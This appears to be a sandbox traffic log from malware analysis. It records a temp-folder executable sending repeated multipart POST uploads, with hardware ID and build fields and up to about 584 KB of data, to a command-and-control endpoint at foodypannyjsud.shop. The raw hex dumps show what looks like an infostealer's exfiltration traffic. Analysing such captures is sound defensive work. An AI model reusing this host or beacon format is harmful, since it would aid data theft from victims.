                              2024-07-06 04:16:40 UTC1369INData Raw: 6f 4a 4b 35 48 5a 2f 75 45 51 36 57 76 49 30 51 77 4a 36 43 4d 57 67 54 53 31 43 52 47 46 38 50 63 36 30 59 6a 66 48 70 6d 55 78 68 30 4c 6a 65 47 79 32 53 6e 6f 58 6f 44 42 64 53 69 52 45 35 36 70 47 49 41 4a 65 4a 47 68 32 78 4c 34 69 5a 49 62 6d 49 58 75 4b 56 4b 4d 6e 50 6f 46 4f 64 42 43 38 4d 45 74 46 59 6c 65 6c 76 67 34 75 44 68 74 33 4a 58 4c 41 71 69 56 71 6a 36 39 76 4e 59 52 46 35 48 74 39 73 55 64 32 47 37 73 77 55 30 4d 71 52 2b 69 6e 52 53 45 49 57 69 46 67 50 59 66 34 4a 58 66 48 2f 69 38 55 6a 6b 6e 6f 66 6a 79 58 52 58 30 59 38 69 77 56 57 32 4a 50 35 2b 63 57 61 51 46 66 49 57 78 79 7a 62 49 6c 62 34 43 67 62 7a 4f 47 51 65 68 74 65 37 35 47 65 78 53 7a 50 46 64 43 4d 45 33 6c 72 45 4d 74 51 68 56 76 59 6d 57 4a 34 47 4a 50 68 4b 64 6d
                              Data Ascii: oJK5HZ/uEQ6WvI0QwJ6CMWgTS1CRGF8Pc60YjfHpmUxh0LjeGy2SnoXoDBdSiRE56pGIAJeJGh2xL4iZIbmIXuKVKMnPoFOdBC8MEtFYlelvg4uDht3JXLAqiVqj69vNYRF5Ht9sUd2G7swU0MqR+inRSEIWiFgPYf4JXfH/i8UjknofjyXRX0Y8iwVW2JP5+cWaQFfIWxyzbIlb4CgbzOGQehte75GexSzPFdCME3lrEMtQhVvYmWJ4GJPhKdm
                              2024-07-06 04:16:40 UTC146INData Raw: 4e 77 50 75 68 36 4f 6c 7a 79 44 42 55 43 4f 67 69 7a 35 33 73 71 44 46 55 6f 63 32 79 45 6c 69 56 70 67 71 46 2f 65 61 4e 48 39 33 67 2b 2f 67 4e 38 56 4f 70 6a 46 51 49 6d 57 61 76 2f 48 6e 74 5a 44 6e 77 79 4c 5a 75 6e 62 48 62 48 73 43 39 6a 33 77 4b 6a 62 54 37 6f 41 7a 30 58 6f 43 46 64 51 54 52 4c 72 4a 6c 77 4b 68 52 57 49 47 35 38 39 34 59 4d 59 6f 61 6c 59 58 6d 38 57 75 35 76 66 62 56 45 52 43 71 38 4e 45 39 46 4c 45 0d 0a
                              Data Ascii: NwPuh6OlzyDBUCOgiz53sqDFUoc2yEliVpgqF/eaNH93g+/gN8VOpjFQImWav/HntZDnwyLZunbHbHsC9j3wKjbT7oAz0XoCFdQTRLrJlwKhRWIG5894YMYoalYXm8Wu5vfbVERCq8NE9FLE
                              2024-07-06 04:16:40 UTC1369INData Raw: 32 32 32 36 0d 0a 37 72 35 77 42 70 44 52 74 33 58 44 32 42 2b 42 30 68 78 37 34 76 59 38 31 35 34 48 46 77 74 31 56 72 57 5a 45 6c 56 6b 30 70 53 61 76 70 44 69 39 43 41 33 38 72 50 63 32 70 59 6a 66 58 39 44 52 75 33 68 75 7a 4c 57 48 2b 57 6a 6f 43 38 6d 73 4a 44 47 4a 61 71 2f 38 4f 62 67 78 57 4c 6d 5a 7a 79 71 6f 77 61 59 53 77 62 48 79 7a 63 73 4a 79 64 62 78 4f 64 52 2b 4d 44 58 70 50 4b 55 54 6d 71 45 55 58 50 45 34 73 61 33 50 4f 72 6a 4d 76 79 65 5a 67 65 39 56 31 6f 7a 63 2b 6a 77 30 36 44 50 4a 72 47 33 63 68 52 75 57 67 57 44 68 50 65 69 4a 75 63 63 53 33 4b 53 2f 4a 35 6d 6c 37 31 52 79 74 50 33 71 68 41 79 4a 45 34 47 67 4f 45 58 55 59 75 62 67 41 4d 45 4a 4e 62 7a 30 76 68 2f 67 77 4c 39 2f 6d 4b 44 69 66 58 75 56 38 61 4c 4d 45 52 43 71
                              Data Ascii: 22267r5wBpDRt3XD2B+B0hx74vY8154HFwt1VrWZElVk0pSavpDi9CA38rPc2pYjfX9DRu3huzLWH+WjoC8msJDGJaq/8ObgxWLmZzyqowaYSwbHyzcsJydbxOdR+MDXpPKUTmqEUXPE4sa3POrjMvyeZge9V1ozc+jw06DPJrG3chRuWgWDhPeiJuccS3KS/J5ml71RytP3qhAyJE4GgOEXUYubgAMEJNbz0vh/gwL9/mKDifXuV8aLMERCq
                              2024-07-06 04:16:40 UTC1369INData Raw: 54 52 5a 70 6f 4a 5a 4b 68 4a 64 4c 43 55 7a 69 62 35 69 4e 39 66 6f 4c 7a 2b 63 44 4c 73 76 4c 4f 73 57 4b 55 50 69 59 55 51 4d 4f 77 6a 39 35 78 5a 37 54 42 73 39 4a 53 57 4a 2f 79 46 39 6c 61 42 73 4c 59 34 4c 33 55 46 59 73 31 4a 77 4e 62 38 6a 58 48 77 63 58 65 69 70 51 43 34 55 53 6d 38 72 50 63 62 34 65 6c 62 48 37 69 4d 39 6a 6c 71 6a 51 44 44 77 57 7a 70 4d 38 67 5a 59 54 43 78 50 2f 62 59 44 44 77 46 4b 4a 55 52 77 32 62 39 69 49 63 65 67 4c 32 50 65 41 71 4e 37 62 2f 41 62 4b 6b 62 70 5a 67 67 56 63 68 72 30 36 56 64 70 46 42 74 33 4e 7a 4f 4a 71 6d 49 33 78 2b 46 73 4b 5a 39 4b 34 47 6c 39 39 33 31 45 49 62 45 39 56 55 55 30 66 65 69 32 54 53 6b 4a 5a 52 46 45 63 38 4b 2f 4c 6e 6d 35 6d 46 6f 34 67 30 4c 6b 61 57 2f 77 44 54 6f 62 38 6d 74 69
                              Data Ascii: TRZpoJZKhJdLCUzib5iN9foLz+cDLsvLOsWKUPiYUQMOwj95xZ7TBs9JSWJ/yF9laBsLY4L3UFYs1JwNb8jXHwcXeipQC4USm8rPcb4elbH7iM9jlqjQDDwWzpM8gZYTCxP/bYDDwFKJURw2b9iIcegL2PeAqN7b/AbKkbpZggVchr06VdpFBt3NzOJqmI3x+FsKZ9K4Gl9931EIbE9VUU0fei2TSkJZRFEc8K/Lnm5mFo4g0LkaW/wDTob8mti


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449747188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:41 UTC285OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 18158
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:41 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BDA297B254EA9D0D68695694110DBFF7--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                              2024-07-06 04:16:41 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                              Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                              2024-07-06 04:16:42 UTC802INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=bikr7lo4r03k6kdns1uhmblsk4; expires=Tue, 29-Oct-2024 22:03:21 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4P1wD5qPtB5fyFZgXKU7pscTY0LztFvig7vjG5qdl5zM6qQfwgBV%2FZ3IDGFUZ9x8ziVDysBqHWqFiOF3obGvZb8gS%2F4loquPDTyJJgr3OqK%2BrA94nacM5HEKzznB%2FE3XD5g5NCjc"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc7e4f8ee78d6-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:42 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                              Data Ascii: eok 8.46.123.33
                              2024-07-06 04:16:42 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449749188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:43 UTC284OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8779
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:43 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BDA297B254EA9D0D68695694110DBFF7--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                              2024-07-06 04:16:43 UTC798INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=q4sni1e99p681mdnf5lvrapc1e; expires=Tue, 29-Oct-2024 22:03:22 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Acf20O1boKsOjIH1NehXTS%2B3HVUSLYaUn1uGnSaY1eFQ6Sc4wCfYOqvOJApQseSs4Ab4W8EdDGFZRoEWAfTkL5UI4YS%2BobrlFtbvDq7Hr8as8vvuV4LuQJXu0Isdpzv87HbVZIGS"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc7ee0a7e420b-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:43 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                              Data Ascii: eok 8.46.123.33
                              2024-07-06 04:16:43 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449750188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:44 UTC285OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 20432
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:44 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BDA297B254EA9D0D68695694110DBFF7--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                              2024-07-06 04:16:44 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                              2024-07-06 04:16:44 UTC798INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=6ebkgflm4rdipdlaneq2qphd52; expires=Tue, 29-Oct-2024 22:03:23 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14f1zUTbYwCNpMRcHTQRSZqS%2B5UwTatIvV596J1e2P67ELKBiYJ1rGxuuNzq7Rri17fGAmHPTM499JCQGwqSJf0FZkoxLz8VXEeZVdnB8t3OW8vECS5hqXn80UU%2F28VoUYy2IJQ2"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc7f5188a0cc1-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:44 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                              Data Ascii: eok 8.46.123.33
                              2024-07-06 04:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.449752188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:46 UTC284OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 1257
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:46 UTC1257OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BDA297B254EA9D0D68695694110DBFF7--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                              2024-07-06 04:16:46 UTC800INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=mceadg0681k5bgo2ghvnjdv2as; expires=Tue, 29-Oct-2024 22:03:25 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CA2V5G2O3BIy%2Fuo6EyO9Tuv6vZ93TY316jSovjwC0ShdG2cdBO%2FT6IngwVOt0mm6MHsUXEMOIXa35jAjerZiV5okoiw88e0S6dc8Dz06km9HKE%2BRN6bvQT5Y8x4UUmCiQhDeO0ga"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc8027dc70ca0-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:46 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                              Data Ascii: eok 8.46.123.33
                              2024-07-06 04:16:46 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449754188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:47 UTC286OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 584434
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:47 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BDA297B254EA9D0D68695694110DBFF7--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                              2024-07-06 04:16:47 UTC15331OUTData Raw: b0 54 c8 12 4f 51 8c 42 5c 1d ea c8 cd 0f b6 dc f3 18 d8 07 ba b1 c6 ec fb b2 a0 65 e5 5a 9b 8a 25 9c 07 1f 8c 47 02 1d 7f be 0f f8 43 99 a2 18 6b 80 6e ab 04 8b 6f 23 62 02 d4 b9 94 72 b4 e5 62 8b 3e 1e 40 5d d6 33 75 e2 a4 d4 dd 77 2f e3 54 73 b1 ca 82 02 3a 28 0f 45 26 26 38 45 e4 43 6b 51 a6 95 29 dd 18 7c 18 2b d4 25 9c f6 90 4a 7c b3 2a 3e 63 2a 57 fd 4b a9 02 1b 80 a8 da e2 f2 42 f3 a0 b7 c4 94 26 fd 18 dd 89 63 78 8a 09 3a 6c c9 ef d4 f1 fd bb 82 b8 d0 57 a8 b1 fd 65 0e 4c e4 c8 6d db 25 fc d3 81 86 65 84 9e b0 51 fe f1 ee e3 2e d1 18 b7 b5 7d fd dc 99 c3 be 13 48 0c 6a 91 19 1b 9d ca 91 7e 2c 92 3b 97 bc cf 58 49 87 ff 59 87 66 34 79 b0 d3 72 bf db 96 67 d1 34 6a 56 ea a7 9f 3a a5 f8 5f 45 4c 68 72 63 b4 e4 0f 5f cd 16 9d bd 1e a6 59 2d a8 06 13
                              Data Ascii: TOQB\eZ%GCkno#brb>@]3uw/Ts:(E&&8ECkQ)|+%J|*>c*WKB&cx:lWeLm%eQ.}Hj~,;XIYf4yrg4jV:_ELhrc_Y-
                              2024-07-06 04:16:47 UTC15331OUTData Raw: bf 66 7b b9 35 bf c6 0d dd f7 4d c6 31 5b 33 66 b3 59 bc 8c 65 c6 91 b5 6a 77 ea b5 3f 3e be 16 bd 25 48 99 ad ce ea 7e 1d 54 6d ae 08 fc 9d 6f a1 5a 7e 4e 94 df 40 11 ef 5f 7d 0d d1 62 fd 0f 43 68 77 c0 ce 2b 14 96 df dc b8 32 1f 35 17 b0 e3 41 4d ef ab 1b d7 9d d8 99 af 09 56 11 2f 1d a4 0b 5f 32 5b af 16 41 ca f7 1c 56 ed ce 44 43 22 42 72 3f bb e8 b1 91 e7 96 67 74 50 f1 87 b1 18 08 f4 9d 52 2b d2 12 24 89 50 3c 70 32 c4 8b 52 f4 03 70 91 23 90 89 86 13 96 c3 ad 4b 62 29 67 7e 61 f0 32 49 9a 2f 38 31 6e d1 a1 56 e1 05 3e 03 96 2b 8e f7 46 d2 9f 9f ef 08 73 12 cb ed 16 24 78 48 ae 9e 85 b8 47 aa bd 4e 5c 32 a5 7b 2b 5a 8e cd 92 79 17 fd f6 62 61 ab 6f 67 67 db ad e2 16 27 4e 59 75 e5 9e 7f 80 8c f1 1d 9b a7 81 ed 2e 79 d1 cb 02 f1 e6 0c 8d 0f 1d ee 86
                              Data Ascii: f{5M1[3fYejw?>%H~TmoZ~N@_}bChw+25AMV/_2[AVDC"Br?gtPR+$P<p2Rp#Kb)g~a2I/81nV>+Fs$xHGN\2{+Zybaogg'NYu.y
                              2024-07-06 04:16:47 UTC15331OUTData Raw: 16 78 2a 18 44 fb 46 86 c5 ab a1 2e 40 09 18 7b 4e e3 ee bf c0 9a aa ee d9 4f 75 77 ad 72 38 12 1c dc 85 1b 2c 10 cd 52 59 99 52 8c 59 e5 ba a8 58 42 60 f3 9f 91 9b 67 67 8f 37 26 c7 7f d8 d7 73 c0 6b 85 fb 3b b3 75 38 81 fd 83 c5 e4 ee fc 93 6c d9 e7 db 2c 12 77 e9 4f df 8d 67 38 99 d4 3e da 4a 57 f3 ef 34 68 4c f1 ce 4e c6 38 f5 4f 33 78 3c 8a d0 2b 2f b1 f3 bc ff cc cf 38 ed 33 e6 7a 0d 94 d7 ee 16 7b 2d cb 41 d1 7b 27 22 b2 41 0d 1f 6f f5 7d 94 39 cf ae 6f 38 87 bc f7 83 ac c0 bf 0f 0c 85 48 fd 42 c4 34 f4 bd df ad 23 d7 1c 2b 70 70 97 f3 59 4d be 58 c2 7c 4b f1 cd e9 e9 3b 13 0f 57 d5 24 6a 4a 53 53 ac 7e 34 5b 71 4f 0a a0 20 e8 82 07 7f 7b 14 e7 c0 de 7d 5d 46 69 fd a3 8a 49 33 cd 82 bd 21 4a 9d 86 89 cd 6e 1c e1 59 80 91 58 7a 43 d4 bf 98 62 79 74
                              Data Ascii: x*DF.@{NOuwr8,RYRYXB`gg7&sk;u8l,wOg8>JW4hLN8O3x<+/83z{-A{'"Ao}9o8HB4#+ppYMX|K;W$jJSS~4[qO {}]FiI3!JnYXzCbyt
